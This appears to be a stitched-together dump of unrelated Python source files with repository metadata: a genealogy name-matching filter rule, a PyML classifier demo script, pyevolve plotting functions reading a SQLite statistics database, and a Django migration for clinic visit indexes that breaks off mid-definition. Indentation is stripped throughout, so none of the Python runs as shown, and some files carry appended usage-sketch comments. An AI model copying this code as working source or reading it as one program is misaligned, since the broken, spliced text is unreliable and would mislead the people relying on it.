_ = glocale.translation.sgettext
#-------------------------------------------------------------------------
#
# Gprime modules
#
#-------------------------------------------------------------------------
from .. import Rule
from ....lib.nameorigintype import NameOriginType
#-------------------------------------------------------------------------
#
# HasNameOf
#
#-------------------------------------------------------------------------
class HasNameOf(Rule):
"""Rule that checks for full or partial name matches"""
labels = [_('Given name:'),
_('Full Family name:'),
_('person|Title:'),
_('Suffix:'),
_('Call Name:'),
_('Nick Name:'),
_('Prefix:'),
_('Single Surname:'),
_('Connector'),
_('Patronymic:'),
_('Family Nick Name:')]
name = _('People with the <name>')
description = _("Matches people with a specified (partial) name")
category = _('General filters')
allow_regex = True
def apply(self, db, person):
for name in [person.get_primary_name()] + person.get_alternate_names():
if self.match_name(name):
return True
return False
def match_name(self, name):
if self.list[0] and not self.match_substring(0, name.get_first_name()):
return False
elif self.list[1] and not self.match_substring(1, name.get_surname()):
return False
elif self.list[2] and not self.match_substring(2, name.get_title()):
return False
elif self.list[3] and not self.match_substring(3, name.get_suffix()):
return False
elif self.list[4] and not self.match_substring(4, name.get_call_name()):
return False
elif self.list[5] and not self.match_substring(5, name.get_nick_name()):
return False
elif self.list[10] and not self.match_substring(10, name.get_family_nick_name()):
return False
else:
for surn in name.get_surname_list():
if self.match_surname(surn):
return True
return False
def match_surname(self, surn):
if self.list[6] and not self.match_substring(6, surn.get_prefix()):
return False
if self.list[7] and not self.match_substring(7, surn.get_surname()):
return False
if self.list[8] and not self.match_substring(8, surn.get_connector()):
return False
if surn.get_origintype().value == NameOriginType.PATRONYMIC:
if self.list[9] and not self.match_substring(9, surn.get_surname()):
return False
return True
|
sam-m888/gprime
|
gprime/filters/rules/person/_hasnameof.py
|
Python
|
gpl-2.0
| 3,872
|
[
"Brian"
] |
0ba59e7f70a0af9b3b8c071a27d7ac091894c3733b30935c15127fb644c33a57
|
import os
import sys
import numpy
from PyML.classifiers import svm,multi,ridgeRegression,knn,composite,modelSelection,platt
from PyML.feature_selection import featsel
from PyML.containers import ker,labels
from PyML.containers import vectorDatasets
from PyML.containers.aggregate import Aggregate
from PyML.containers.kernelData import KernelData
from PyML.containers.sequenceData import SequenceData
from PyML.evaluators import assess
heartdatafile = '../../data/heart.data'
irisdatafile = '../../data/iris.data'
yeastdatafile = '../../data/yeast.data'
def test(component='svm', **args) :
container = 'SparseDataSet'
if 'container' in args :
container = args['container']
try :
DataSet = getattr(vectorDatasets, container)
except AttributeError :
raise ValueError, 'wrong container ' + container
results = {}
comp = 'general'
if component == 'all' or component == comp :
s = svm.SVM()
results = {}
d = DataSet (heartdatafile, labelsColumn = 0)
s.train(d)
s.test(d)
s = svm.SVM()
s.stratifiedCV(d)
print 'starting aggregate****************'
d2 = Aggregate([d,d])
print 'end aggregate'
r = s.stratifiedCV(d2)
d.attachKernel('polynomial')
s.cv(d)
d.attachKernel('linear')
s = svm.SVM()
s.train(d)
s.train(d, saveSpace = False)
s.save("tmp")
loaded = svm.loadSVM("tmp", datasetClass=DataSet)
r = loaded.test(d)
d.attachKernel('gaussian', gamma = 0.01)
s.train(d, saveSpace = False)
s.save("tmp")
loaded = svm.loadSVM("tmp", datasetClass=DataSet, labelsColumn = 1)
r = loaded.test(d)
os.remove('tmp')
d = DataSet(numpy.random.randn(100,10))
d = DataSet([[1,2], [2,3]])
d = SequenceData(['asa', 'ben', 'hur'])
comp = 'svm'
if component == 'all' or component == comp :
d = DataSet (heartdatafile, labelsColumn = 0)
results[comp] = []
d.attachKernel('polynomial')
s=svm.SVM()
results[comp].append(
s.cv(d, saveSpace = True))
d.attachKernel('linear')
results[comp].append(
s.cv(d))
comp = 'kernelData'
if component == 'all' or component == comp :
d = DataSet (heartdatafile, labelsColumn = 0)
results[comp] = []
kdata = KernelData('heart.kernel', gistFormat = True)
kdata.attachLabels(d.labels)
s=svm.SVM()
results[comp].append(
s.cv(kdata))
kdata.attachKernel('gaussian', gamma = 0.1)
results[comp].append(
s.cv(kdata))
comp = 'normalization'
if component == 'all' or component == comp :
results[comp] = []
data = DataSet (heartdatafile, labelsColumn = 0)
data.attachKernel('polynomial', degree = 4, normalization = 'dices')
s=svm.SVM()
results[comp].append(
s.cv(data))
comp = 'svr'
if component == 'all' or component == comp :
d = DataSet (heartdatafile, labelsColumn = 0, numericLabels = True)
results[comp] = []
s = svm.SVR()
#results[comp].append(
# s.cv(d, saveSpace = True))
#results[comp].append(
# s.trainTest(d, range(150), range(151, 250)))
results[comp].append( s.cv(d) )
comp = 'save'
if component == 'all' or component == comp :
results[comp] = []
s = svm.SVM()
data = DataSet (heartdatafile, labelsColumn = 0)
import tempfile
tmpfile = tempfile.mktemp()
r = s.cv(data)
r.save(tmpfile)
r = assess.loadResults(tmpfile)
results['save'].append(r)
r = s.nCV(data)
r.save(tmpfile)
results['save'].append(assess.loadResults(tmpfile))
r = {}
for i in range(10) :
r[i] = s.cv(data)
assess.saveResultObjects(r, tmpfile)
r = assess.loadResults(tmpfile)
comp = 'classifiers'
if component == 'all' or component == comp :
d = DataSet (heartdatafile, labelsColumn = 0)
results[comp] = []
cl = knn.KNN()
results[comp].append(
cl.stratifiedCV(d))
print 'testing ridge regression'
ridge = ridgeRegression.RidgeRegression()
results[comp].append(
ridge.cv(d))
comp = 'platt'
if component == 'all' or component == 'platt' :
results[comp] = []
d = DataSet (heartdatafile, labelsColumn = 0)
p = platt.Platt2(svm.SVM())
results[comp].append(p.stratifiedCV(d))
comp = 'multi'
if component == 'all' or component == comp :
results[comp] = []
d = DataSet(irisdatafile, labelsColumn = -1)
mc = multi.OneAgainstOne (svm.SVM())
results[comp].append(
mc.cv(d))
d = DataSet(irisdatafile, labelsColumn = -1)
mc = multi.OneAgainstRest (svm.SVM())
results[comp].append(
mc.cv(d))
mc = multi.OneAgainstRest (svm.SVM())
d.attachKernel('poly')
results[comp].append(
mc.cv(d))
d.attachKernel('linear')
mc = multi.OneAgainstRest (svm.SVM())
#kdata = datafunc.KernelData('iris.linear.kernel',
# labelsFile = 'irisY.csv', labelsColumn = 0, gistFormat = True)
#results[comp].append(mc.cv(kdata))
comp = 'featsel'
if component == 'all' or component == comp :
results[comp] = []
s = svm.SVM()
d = DataSet (yeastdatafile, labelsColumn = 0)
d2 = labels.oneAgainstRest(d, '2')
results[comp].append(
s.stratifiedCV(d2))
# feature selection using RFE
m = composite.FeatureSelect (s, featsel.RFE())
results[comp].append(
m.stratifiedCV(d2, 3))
fs = featsel.FeatureScore ('golub')
f = featsel.Filter (fs, sigma = 2)
f = featsel.Filter (fs, numFeatures = 20)
m = composite.FeatureSelect (s, f)
results[comp].append(
m.stratifiedCV(d2, 3))
# same thing but with a Chain:
c = composite.Chain ([f,s])
#r = c.stratifiedCV (d2)
comp = 'modelSelection'
if component == 'all' or component == comp :
results[comp] = []
s = svm.SVM()
d = DataSet (heartdatafile, labelsColumn = 0)
p = modelSelection.ParamGrid(svm.SVM(ker.Polynomial()), 'C', [0.1, 1, 10, 100],
'kernel.degree', [2, 3, 4])
p = modelSelection.ParamGrid(svm.SVM(ker.Gaussian()), 'C', [0.1, 1, 10, 100],
'kernel.gamma', [0.01, 0.1, 1])
#p = modelSelection.Param(svm.SVM(), 'C', [0.1, 1, 10, 100])
m = modelSelection.ModelSelector(p, measure = 'roc', foldsToPerform = 2)
m = modelSelection.ModelSelector(p)
#m = modelSelection.SVMselect()
results[comp].append(
m.cv(d))
return results
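
# --- Hedged usage sketch (appended for illustration) ---
# Assumes PyML is installed and the script runs from PyML/demo so the
# relative heart.data path above resolves; it mirrors the basic
# train/cross-validate pattern the 'svm' component exercises:
def _sketch_basic_svm():
    d = vectorDatasets.SparseDataSet(heartdatafile, labelsColumn=0)
    s = svm.SVM()
    return s.stratifiedCV(d, 5)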
if __name__ == '__main__' :
if len(sys.argv) > 1 :
test(sys.argv[1])
else :
test()
|
cathywu/Sentiment-Analysis
|
PyML-0.7.9/PyML/demo/test.py
|
Python
|
gpl-2.0
| 7,168
|
[
"Gaussian"
] |
7a590baef54d86443e699f326a8e3e857658e9833f86d01585baae452f1ff277
|
import pylab
from matplotlib.font_manager import FontProperties
import matplotlib.cm
def graph_pop_heatmap_raw(pop, identify, minimize=False, colormap="jet", filesave=None):
pylab.imshow(pop, aspect="auto", interpolation="gaussian", cmap=matplotlib.cm.__dict__[colormap])
pylab.title("Plot of pop. raw scores along the generations")
pylab.xlabel('Population')
pylab.ylabel('Generations')
pylab.grid(True)
pylab.colorbar()
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_diff_raw(pop, identify, minimize=False, filesave=None):
x = []
diff_raw_y = []
diff_fit_y = []
for it in pop:
x.append(it["generation"])
diff_raw_y.append(it["rawMax"] - it["rawMin"])
diff_fit_y.append(it["fitMax"] - it["fitMin"])
pylab.figure()
pylab.subplot(211)
pylab.plot(x, diff_raw_y, "g", label="Raw difference", linewidth=1.2)
pylab.fill_between(x, diff_raw_y, color="g", alpha=0.1)
diff_raw_max= max(diff_raw_y)
gen_max_raw = x[diff_raw_y.index(diff_raw_max)]
pylab.annotate("Maximum (%.2f)" % (diff_raw_max,), xy=(gen_max_raw, diff_raw_max), xycoords='data',
xytext=(-150, -20), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.xlabel("Generation (#)")
pylab.ylabel("Raw difference")
pylab.title("Plot of evolution identified by '%s'" % (identify))
pylab.grid(True)
pylab.legend(prop=FontProperties(size="smaller"), loc=0)
pylab.subplot(212)
pylab.plot(x, diff_fit_y, "b", label="Fitness difference", linewidth=1.2)
pylab.fill_between(x, diff_fit_y, color="b", alpha=0.1)
diff_fit_max= max(diff_fit_y)
gen_max_fit = x[diff_fit_y.index(diff_fit_max)]
pylab.annotate("Maximum (%.2f)" % (diff_fit_max,), xy=(gen_max_fit, diff_fit_max), xycoords='data',
xytext=(-150, -20), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.xlabel("Generation (#)")
pylab.ylabel("Fitness difference")
pylab.grid(True)
pylab.legend(prop=FontProperties(size="smaller"), loc=0)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_errorbars_raw(pop, identify, minimize=False, filesave=None):
x = []
y = []
yerr_max = []
yerr_min = []
for it in pop:
x.append(it["generation"])
y.append(it["rawAve"])
ymax = it["rawMax"] - it["rawAve"]
ymin = it["rawAve"] - it["rawMin"]
yerr_max.append(ymax)
yerr_min.append(ymin)
pylab.figure()
pylab.errorbar(x, y, [yerr_min, yerr_max], ecolor="g")
pylab.xlabel('Generation (#)')
pylab.ylabel('Raw score Min/Avg/Max')
pylab.title("Plot of evolution identified by '%s' (raw scores)" % (identify))
pylab.grid(True)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_errorbars_fitness(pop, identify, minimize=False, filesave=None):
x = []
y = []
yerr_max = []
yerr_min = []
for it in pop:
x.append(it["generation"])
y.append(it["fitAve"])
ymax = it["fitMax"] - it["fitAve"]
ymin = it["fitAve"] - it["fitMin"]
yerr_max.append(ymax)
yerr_min.append(ymin)
pylab.figure()
pylab.errorbar(x, y, [yerr_min, yerr_max], ecolor="g")
pylab.xlabel('Generation (#)')
pylab.ylabel('Fitness score Min/Avg/Max')
pylab.title("Plot of evolution identified by '%s' (fitness scores)" % (identify))
pylab.grid(True)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_maxmin_raw(pop, identify, minimize=False, filesave=None):
x = []
max_y = []
min_y = []
std_dev_y = []
avg_y = []
for it in pop:
x.append(it["generation"])
max_y.append(it["rawMax"])
min_y.append(it["rawMin"])
std_dev_y.append(it["rawDev"])
avg_y.append(it["rawAve"])
pylab.figure()
pylab.plot(x, max_y, "g", label="Max raw", linewidth=1.2)
pylab.plot(x, min_y, "r", label="Min raw", linewidth=1.2)
pylab.plot(x, avg_y, "b", label="Avg raw", linewidth=1.2)
pylab.plot(x, std_dev_y, "k", label="Std Dev raw", linewidth=1.2)
pylab.fill_between(x, min_y, max_y, color="g", alpha=0.1, label="Diff max/min")
if minimize: raw_max = min(min_y)
else: raw_max= max(max_y)
if minimize: gen_max = x[min_y.index(raw_max)]
else: gen_max = x[max_y.index(raw_max)]
min_std = min(std_dev_y)
gen_min_std = x[std_dev_y.index(min_std)]
max_std = max(std_dev_y)
gen_max_std = x[std_dev_y.index(max_std)]
if minimize: annot_label = "Minimum (%.2f)" % (raw_max,)
else: annot_label = "Maximum (%.2f)" % (raw_max,)
pylab.annotate(annot_label, xy=(gen_max, raw_max), xycoords='data',
xytext=(8, 15), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.annotate("Min StdDev (%.2f)" % (min_std,), xy=(gen_min_std, min_std), xycoords='data',
xytext=(8, 15), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.annotate("Max StdDev (%.2f)" % (max_std,), xy=(gen_max_std, max_std), xycoords='data',
xytext=(8, 15), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.xlabel("Generation (#)")
pylab.ylabel("Raw score")
pylab.title("Plot of evolution identified by '%s' (raw scores)" % (identify))
pylab.grid(True)
pylab.legend(prop=FontProperties(size="smaller"),loc=0)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_maxmin_fitness(pop, identify, minimize=False, filesave=None):
x = []
max_y = []
min_y = []
avg_y = []
for it in pop:
x.append(it["generation"])
max_y.append(it["fitMax"])
min_y.append(it["fitMin"])
avg_y.append(it["fitAve"])
pylab.figure()
pylab.plot(x, max_y, "g", label="Max fitness")
pylab.plot(x, min_y, "r", label="Min fitness")
pylab.plot(x, avg_y, "b", label="Avg fitness")
pylab.fill_between(x, min_y, max_y, color="g", alpha=0.1, label="Diff max/min")
if minimize: raw_max = min(min_y)
else: raw_max = max(max_y)
if minimize: gen_max = x[min_y.index(raw_max)]
else: gen_max = x[max_y.index(raw_max)]
if minimize: annot_label = "Minimum (%.2f)" % (raw_max,)
else: annot_label = "Maximum (%.2f)" % (raw_max,)
pylab.annotate(annot_label, xy=(gen_max, raw_max), xycoords='data',
xytext=(8, 15), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.xlabel("Generation (#)")
pylab.ylabel("Fitness score")
pylab.title("Plot of evolution identified by '%s' (fitness scores)" % (identify))
pylab.grid(True)
pylab.legend(prop=FontProperties(size="smaller"),loc=0)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def load_population(dbfile, identify):
    pop = []  # empty list rather than None, so callers can safely take len()
import os.path
if not os.path.exists(dbfile):
print "Database file '%s' not found !" % (dbfile, )
return pop
import sqlite3
print "Loading database..."
conn = sqlite3.connect(dbfile)
conn.row_factory = sqlite3.Row
c = conn.cursor()
ret = c.execute("select * from statistics where identify = ?", (identify,))
pop = ret.fetchall()
ret.close()
conn.close()
if len(pop) <= 0:
print "No statistic data found for the identify '%s' !" % (identify,)
return pop
print "%d generations found !" % (len(pop),)
return pop
def load_population_hm(dbfile, identify):
    pop = []  # empty list rather than None, so callers can safely take len()
import os.path
if not os.path.exists(dbfile):
print "Database file '%s' not found !" % (dbfile, )
return pop
import sqlite3
print "Loading database..."
conn = sqlite3.connect(dbfile)
conn.row_factory = sqlite3.Row
c = conn.cursor()
ret = c.execute("select distinct generation from population where identify = ?", (identify,))
generations = ret.fetchall()
if len(generations) <= 0:
print "No generation data found for the identify '%s' !" % (identify,)
return pop
pop = []
for gen in generations:
pop_tmp = []
ret = c.execute("""
select * from population
where identify = ?
and generation = ?
""", (identify, gen[0]))
ret_fetch = ret.fetchall()
for it in ret_fetch:
pop_tmp.append(it["raw"])
pop.append(pop_tmp)
ret.close()
conn.close()
if len(pop) <= 0:
print "No statistic data found for the identify '%s' !" % (identify,)
return pop
print "%d generations found !" % (len(pop),)
return pop
def plot_errorbars_raw(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_errorbars_raw(pop, identify)
def plot_errorbars_fitness(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_errorbars_fitness(pop, identify)
def plot_maxmin_raw(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_maxmin_raw(pop, identify)
def plot_maxmin_fitness(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_maxmin_fitness(pop, identify)
def plot_diff_raw(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_diff_raw(pop, identify)
def plot_pop_heatmap_raw(dbfile, identify):
pop = load_population_hm(dbfile, identify)
if len(pop) > 0:
graph_pop_heatmap_raw(pop, identify)
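
# --- Hedged usage sketch (appended for illustration) ---
# Both the database file name and the identify tag below are assumptions:
# they must match what pyevolve's statistics adapter wrote during the
# evolution run.  load_population() prints a message and returns an empty
# list when the file is missing, so this is safe to run as-is.
if __name__ == "__main__":
    plot_maxmin_raw("pyevolve.db", "ex1")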
|
ecervera/ga-nb
|
pyevolve_plot.py
|
Python
|
mit
| 10,489
|
[
"Gaussian"
] |
cdb768308a55a58869a97b8ca187b0ad8e087ee2d9d41aa048c85923a097d750
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'Visit', fields ['wrhi_orig_date']
db.create_index(u'core_visit', ['wrhi_orig_date'])
# Adding index on 'Visit', fields ['date']
db.create_index(u'core_visit', ['date'])
# Adding index on 'HistoricalVisit', fields ['wrhi_orig_date']
db.create_index(u'core_historicalvisit', ['wrhi_orig_date'])
# Adding index on 'HistoricalVisit', fields ['date']
db.create_index(u'core_historicalvisit', ['date'])
def backwards(self, orm):
# Removing index on 'HistoricalVisit', fields ['date']
db.delete_index(u'core_historicalvisit', ['date'])
# Removing index on 'HistoricalVisit', fields ['wrhi_orig_date']
db.delete_index(u'core_historicalvisit', ['wrhi_orig_date'])
# Removing index on 'Visit', fields ['date']
db.delete_index(u'core_visit', ['date'])
# Removing index on 'Visit', fields ['wrhi_orig_date']
db.delete_index(u'core_visit', ['wrhi_orig_date'])
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.authprofile': {
'Meta': {'object_name': 'AuthProfile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'patient': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Patient']", 'unique': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'core.changerequest': {
'Meta': {'ordering': "['-created_at']", 'object_name': 'ChangeRequest'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'request': ('django.db.models.fields.TextField', [], {}),
'request_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'pending'", 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'visit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Visit']"})
},
u'core.clinic': {
'Meta': {'object_name': 'Clinic'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'te_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'clinic'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'core.clinicnamemapping': {
'Meta': {'object_name': 'ClinicNameMapping'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'wrhi_clinic_name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.event': {
'Meta': {'object_name': 'Event'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'core.historicalpatient': {
'Meta': {'ordering': "('-history_id',)", 'object_name': 'HistoricalPatient'},
'active_msisdn': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.MSISDN']", 'null': 'True', 'blank': 'True'}),
'age': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deceased': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'disclosed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 4, 17, 0, 0)'}),
'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'history_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
u'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['core.Language']", 'null': 'True', 'blank': 'True'}),
'last_clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'opted_in': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'regiment': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'risk_profile': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'sex': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}),
'surname': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'te_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'core.historicalvisit': {
'Meta': {'ordering': "('-history_id',)", 'object_name': 'HistoricalVisit'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']"}),
'comment': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'db_index': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 4, 17, 0, 0)'}),
'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'history_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
u'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
'patient': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Patient']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'te_visit_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'visit_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True', 'blank': 'True'}),
'wrhi_orig_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'db_index': 'True'})
},
u'core.language': {
'Meta': {'object_name': 'Language'},
'attended_message': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'missed_message': ('django.db.models.fields.TextField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'tomorrow_message': ('django.db.models.fields.TextField', [], {}),
'twoweeks_message': ('django.db.models.fields.TextField', [], {})
},
u'core.messagetype': {
'Meta': {'object_name': 'MessageType'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']", 'null': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['auth.Group']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Language']"}),
'message': ('django.db.models.fields.TextField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'core.msisdn': {
'Meta': {'ordering': "['-id']", 'object_name': 'MSISDN'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msisdn': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
u'core.patient': {
'Meta': {'ordering': "['created_at']", 'object_name': 'Patient'},
'active_msisdn': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.MSISDN']", 'null': 'True', 'blank': 'True'}),
'age': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deceased': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'disclosed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['core.Language']", 'null': 'True', 'blank': 'True'}),
'last_clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']", 'null': 'True', 'blank': 'True'}),
'msisdns': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'contacts'", 'symmetrical': 'False', 'to': u"orm['core.MSISDN']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'opted_in': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'regiment': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'risk_profile': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'sex': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}),
'surname': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'te_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'core.pleasecallme': {
'Meta': {'object_name': 'PleaseCallMe'},
